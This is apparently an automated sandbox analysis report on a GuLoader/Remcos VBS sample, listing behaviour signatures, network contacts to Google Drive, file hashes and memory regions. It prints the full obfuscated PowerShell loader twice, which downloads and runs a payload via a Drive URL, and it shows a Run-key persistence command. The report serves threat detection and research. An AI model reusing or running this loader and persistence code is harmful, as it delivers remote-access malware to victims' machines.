Analysis Overview
SHA256
f5e9a12645109faa38afb7b1784f96a6355386098b83cc28fe166e36d2e707f4
Threat Level: Known bad
The file 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Remcos
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 09:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 09:59
Reported
2024-04-02 10:01
Platform
win7-20240221-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Guloader,Cloudeye
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 276 set thread context of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.178.1:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| GB | 142.250.178.1:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt
| MD5 | 7b4fdea2a0af3dbb3e9af46780e69650 |
| SHA1 | de69a8afb30d505ddd396ef3a4e8a1f29a433365 |
| SHA256 | 6b1fa76d82599968c89764e75052e8d79e5dd4b1b161729424cdc987c5c63b7b |
| SHA512 | 191950acaceeced7a8ad35f7c4e825e709088942b59b2d118b1b1b57fab6428a0247fe5528bcd55e5f2ec8fb64eb153152458db69f894c93a692bc42fe0f7820 |
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt
| MD5 | 114a16150326060e22136b52754269d6 |
| SHA1 | 9922af44d5ae3aad88e7142110b374d62b1e286e |
| SHA256 | 430d09dee4de6ed578860cb29ce7bc18aa71cb3d7ecc3b74f6c34b018fbed64a |
| SHA512 | 10fcd67bfeaf39bc099ec43688c58c168067ea6690bf40ecf3163745ac9b3829b2a1f3075151580ee4d9162e41d0eb6114687a9a63aaff0ffbc5217306a9e232 |
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt
| MD5 | ce31aad931645728cb11543a9cd80f8e |
| SHA1 | 3e04faa0eebb25e42df967a276d3ce916947adf9 |
| SHA256 | 5e765d9805803b5190ecf3cb07505d8ddc2b45645240c0ce905ecbda3e46ab06 |
| SHA512 | 07e2f610945bac67ded6f43b0422295fe5803aeb91b6e4208350bb197f27ee73340462969917e883e3a3aac60a34eb5c779802d9223b04b11010e761c198e5e7 |
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt
| MD5 | c3b48e90f811fd16ef69026fdc4a2e50 |
| SHA1 | df10a00a6d68af91801d446d669b46e69fe8cc56 |
| SHA256 | 4ebcc3f20194ee869ed413b7bbe7fc466ddced60b792e09b9ec70b906984ff0f |
| SHA512 | 7b6751535b2d2237d207236327f64f5281f02f2b70d08abc3a71f30ba4e0520f6f794eb275e75d7b1babf153d9d528eadf2ab07d1616fad17792ada0c2c53eda |
memory/1104-261-0x000000001B810000-0x000000001BAF2000-memory.dmp
memory/1104-263-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1104-262-0x0000000000300000-0x0000000000308000-memory.dmp
memory/1104-264-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/1104-265-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/1104-266-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/1104-267-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1104-268-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/1104-269-0x0000000002980000-0x00000000029A2000-memory.dmp
memory/1104-270-0x00000000022A0000-0x00000000022B2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7ENQ859Z3E8CFSKT0PHQ.temp
| MD5 | 938d11d152f7becaf03cc896662552e9 |
| SHA1 | 7e4aff6bbc098c29f3df3330cf3fc5beb4d802af |
| SHA256 | 3bb781cfc9ce56808126b84acca7d4df37f287b5d9981650ffdc7a6c5bc117d5 |
| SHA512 | 56c5fe221ceb2d97a84a830d7001877b9bbba8cd345709ba992c201908cc70f58144640c2429a8afe257c52d569a3e42d411ce2fc092711c62343ffad25eb1b0 |
memory/276-273-0x0000000073C20000-0x00000000741CB000-memory.dmp
memory/276-274-0x0000000002EA0000-0x0000000002EE0000-memory.dmp
memory/276-275-0x0000000073C20000-0x00000000741CB000-memory.dmp
memory/276-276-0x0000000002EA0000-0x0000000002EE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab447F.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f5ce70305a47d6a1e13d1fad04b92a29 |
| SHA1 | f806975d9555a6cf7b212339da5e41d2182d6f29 |
| SHA256 | f5f402b6d27bbd2511ac609c34f92198ff0bd77a9f599f7b7ad721b62fc60f2c |
| SHA512 | 60f118abae01336e9cf2be3020b17e1cee7b598889b5ffaed019a04bb33b805b7651938bcbf5bfebb7edc7589e733d37d756a57713da34d08b1c5a80a46715ad |
memory/1104-288-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/276-289-0x0000000002EA0000-0x0000000002EE0000-memory.dmp
memory/1104-290-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/1104-291-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/1104-292-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/276-293-0x0000000003010000-0x0000000003011000-memory.dmp
memory/276-294-0x00000000069D0000-0x000000000A678000-memory.dmp
memory/276-295-0x0000000077BE0000-0x0000000077D89000-memory.dmp
memory/276-296-0x0000000073C20000-0x00000000741CB000-memory.dmp
memory/276-298-0x0000000077DD0000-0x0000000077EA6000-memory.dmp
memory/276-297-0x0000000002EA0000-0x0000000002EE0000-memory.dmp
memory/1860-299-0x0000000077BE0000-0x0000000077D89000-memory.dmp
memory/1860-300-0x0000000077E06000-0x0000000077E07000-memory.dmp
memory/1860-301-0x0000000077DD0000-0x0000000077EA6000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d8ee47325b962698fe53acb4209bf09e |
| SHA1 | a505e201cecffee4372c9473b59b4e66a3ad9604 |
| SHA256 | 6d56bb315c8f6e7193648bd5f355b2cd064e23c0fbbb1ab1a986dd79ef23d7ff |
| SHA512 | 084429cf07583b7808c9ee60ae11e7a56dd2c167d975de58c50c107090476afa91e7e1ac0773d721bd50a0078228f053a3e0bb8f785058e31985e0c16121eda2 |
C:\Users\Admin\AppData\Local\Temp\TarA0C3.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
memory/1860-323-0x0000000000420000-0x0000000001482000-memory.dmp
memory/1860-324-0x0000000077DD0000-0x0000000077EA6000-memory.dmp
memory/1860-325-0x0000000001490000-0x0000000005138000-memory.dmp
memory/1860-327-0x0000000077BE0000-0x0000000077D89000-memory.dmp
memory/1104-329-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1860-328-0x0000000077DD0000-0x0000000077EA6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-02 09:59
Reported
2024-04-02 10:01
Platform
win10v2004-20231215-en
Max time kernel
91s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
